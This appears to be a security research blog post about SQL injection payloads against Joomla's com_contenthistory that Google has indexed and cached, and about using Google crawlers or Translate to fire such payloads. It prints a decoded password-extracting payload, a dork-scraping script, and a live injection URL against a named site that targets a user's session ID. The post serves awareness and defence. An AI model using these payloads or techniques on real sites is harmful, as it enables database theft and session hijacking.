__Google is a well-known search engine; in the security community it is also famous for “Google dorks”: finding vulnerable websites using Google queries.__
Exploits in the Google URL Database
Using Google dorks is not new and has been discussed thoroughly. However, while we were analyzing the Joomla SQL injection vulnerability in com_contenthistory, we found this URI in the results of a Google query:
If we decode the URL parameters, we get this:
com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from
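Decoding such parameters takes one standard-library call; a minimal sketch in Python (the `encoded` string below is a shortened, hypothetical query string of the same shape, not the full payload):

```python
from urllib.parse import unquote_plus

# Hypothetical, shortened query string of the same shape as the indexed one
encoded = "option=com_contenthistory&view=history&list%5Bselect%5D=%28select+1%29"
print(unquote_plus(encoded))
# option=com_contenthistory&view=history&list[select]=(select 1)
```

`unquote_plus` handles both the percent-encoded bytes (`%5B` → `[`) and the `+`-encoded spaces, which is what makes the SQL in the `list[select]` parameter readable.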
Please note that this specific URI is not complete; the full request, however, is potentially executed by Google's web crawlers.
What is the issue?
This effect is interesting for three reasons:
1. Abusing Google (or other search engines) to execute payloads
2. Finding potential zero-days in the Google index
3. Retrieving exploit results, such as passwords and private user data, which remain cached in Google even after the issue has been fixed
Abusing Google to execute payloads
The first technique is elaborated on in Phrack 57, 0x0a, “Against the System: Rise of the Robots” by Michal Zalewski. Zalewski uses an HTML document containing links with payloads aimed at potentially vulnerable webservers. When crawlers pick up these links, they execute the payload on his behalf. To quote the founders of Google on this issue:
“[…] big difference between the web and traditional well controlled collections is that there is virtually no control over what people can put on the web. Couple this flexibility to publish anything with the enormous influence of search engines to route traffic and companies which deliberately manipulate search engines for profit become a serious problem.” — Sergey Brin, Lawrence Page, “The Anatomy of a Large-Scale Hypertextual Web Search Engine”

[Image: Googlebot concept — Sergey Brin, Lawrence Page, Stanford University]
To expand a bit on the first issue: you could use the Google Translate service as a proxy. This lets you skip waiting for the crawlers to pick up your malicious links and have them executed straight away:
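As a sketch, wrapping a target link in the historic translate endpoint could look like the following; the endpoint path and parameter names (`sl`, `tl`, `u`) are assumptions based on how the service worked at the time, and the target URL is a placeholder:

```python
from urllib.parse import urlencode

def translate_proxy_url(target: str, src: str = "nl", dst: str = "en") -> str:
    # Assumed historic endpoint: translate.google.com fetched the URL in the
    # `u` parameter server-side, effectively proxying the request.
    return "https://translate.google.com/translate?" + urlencode(
        {"sl": src, "tl": dst, "u": target}
    )

url = translate_proxy_url("http://victim.example/index.php?option=com_contenthistory")
print(url)
```

Because Google's servers perform the fetch, the request to the target appears to originate from Google rather than from the attacker.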
Finding exploits in the Google Index
The following script can be used to scrape Google; note that it needs some fine-tuning:
```
pi@raspberrypi ~/bitsensor $ wget http://www.catonmat.net/downlo...
--2016-01-04 19:54:14--  http://www.catonmat.net/downlo...
Resolving www.catonmat.net (www.catonmat.net)... 220.127.116.11
Connecting to www.catonmat.net (www.catonmat.net)|18.104.22.168|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: `xgoogle.zip`

    [ <=> ]  70,319  1121K/s  in 0.1s

2016-01-04 19:54:20 (1121 KB/s) - `xgoogle.zip` saved

pi@raspberrypi ~/bitsensor $ unzip xgoogle.zip
Archive:  xgoogle.zip  www.catonmat.net
   creating: examples/
  inflating: examples/example2.py
  inflating: examples/example3.py
  inflating: examples/example1.py
   creating: programs/
  inflating: programs/google_fight2.py
  inflating: programs/google_fight.py
  inflating: programs/english.py
   creating: xgoogle/
  inflating: xgoogle/browser.py
  inflating: xgoogle/sponsoredlinks.py
  inflating: xgoogle/__init__.pyc
  inflating: xgoogle/search.py
  inflating: xgoogle/BeautifulSoup.pyc
  inflating: xgoogle/googlesets.py
  inflating: xgoogle/BeautifulSoup.py
  inflating: xgoogle/browser.pyc
  inflating: xgoogle/search.pyc
  inflating: xgoogle/translate.py
  inflating: xgoogle/__init__.py
  inflating: contributors.txt
  inflating: projects-using-xgoogle.txt
  inflating: readme.txt

pi@raspberrypi ~/bitsensor $ ls
contributors.txt  examples  programs  projects-using-xgoogle.txt  readme.txt  xgoogle

pi@raspberrypi ~/bitsensor $ cat GoogleSearch.py
from xgoogle.search import GoogleSearch, SearchError
from threading import Thread
from random import randint
import time

try:
    gs = GoogleSearch("inurl:'index.php?option=com_contenthistory'")
    gs.results_per_page = 50
    displayedResults = 0
    results = gs.get_results()
    while displayedResults < gs.num_results:
        for res in results:
            if res.url is not None:
                print res.url.encode('utf8')
        displayedResults += gs.results_per_page
        print
        time.sleep(randint(15, 60))
        results = gs.get_results()
except SearchError, e:
    print "Search failed: %s" % e

pi@raspberrypi ~/bitsensor $ python GoogleSearch.py
http://hafelekar.com/en/index.php?option=com_contenthistory&view=history&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C(SELECT+concat(session_id%2C0x23)+FROM+ugq2y_session+WHERE+userid%3D44+LIMIT+0%2C1)))--+-
```
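Scraped result URLs can then be filtered for injection markers before manual review; a minimal sketch (the marker list is an illustrative assumption, not an exhaustive detection rule):

```python
import re
from urllib.parse import unquote_plus

# Common MySQL error-based injection functions; illustrative, not exhaustive
SQLI_MARKERS = re.compile(r"(extractvalue|updatexml|concat)\s*\(", re.IGNORECASE)

def looks_injected(url: str) -> bool:
    """Return True when the decoded query string contains an injection marker."""
    return bool(SQLI_MARKERS.search(unquote_plus(url)))

# The result URL found above
url = ("http://hafelekar.com/en/index.php?option=com_contenthistory&view=history"
       "&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C"
       "(SELECT+concat(session_id%2C0x23)+FROM+ugq2y_session+WHERE+userid%3D44+LIMIT+0%2C1)))--+-")
print(looks_injected(url))  # True
```

Decoding before matching matters: the payload's commas and brackets are percent-encoded in the indexed URL, so a naive match against the raw string would miss variants that also encode the function names.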
All users of the affected Joomla website should be informed about the breach, and Google should be contacted to remove the cached page. This prevents attackers from using Google Cache to retrieve information such as usernames and passwords even after the site itself has been fixed.
Using Google Alerts
Google Alerts is a service that sends an email whenever new results for a given query appear. For example, if we add the above-mentioned Google query, we receive an email naming the newly indexed site every time a new page enters the index. Using this methodology, we get a good view of which kinds of payloads cyber criminals are using.
The screenshot shows an example Google Alerts email. Please note that in this case another dork is used: